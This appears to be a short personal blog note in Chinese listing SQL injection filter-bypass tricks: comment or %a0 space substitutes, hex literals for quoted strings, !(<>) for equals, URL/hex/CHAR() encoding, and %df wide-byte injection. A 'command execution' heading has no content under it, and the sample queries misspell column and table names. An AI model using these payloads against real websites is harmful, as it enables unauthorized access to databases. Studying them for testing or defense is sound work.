命令执行Bypass

SQL注入Bypass

绕过空格

/**/   注释代替空格
%a0
<>

过滤引号

使用hex替代
如:
select coulumn_name from information_schema.columns where tabel_name = 'users'
select coulumn_name from information_schema.columns where tabel_name = 0x7573657273

过滤等号

将=换为!(<>)#不大于也不小于就是等于
如:
where name = 'flagtable'
where !(name<>'flagtable')

通用绕过(编码)

如URLEncode编码,ASCII,HEX,unicode编码绕过:

or1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

宽字节注入

用%df来消掉\(转义符)
posted @ 2024-02-21 12:57  Liooooo  阅读(18)  评论(0编辑  收藏  举报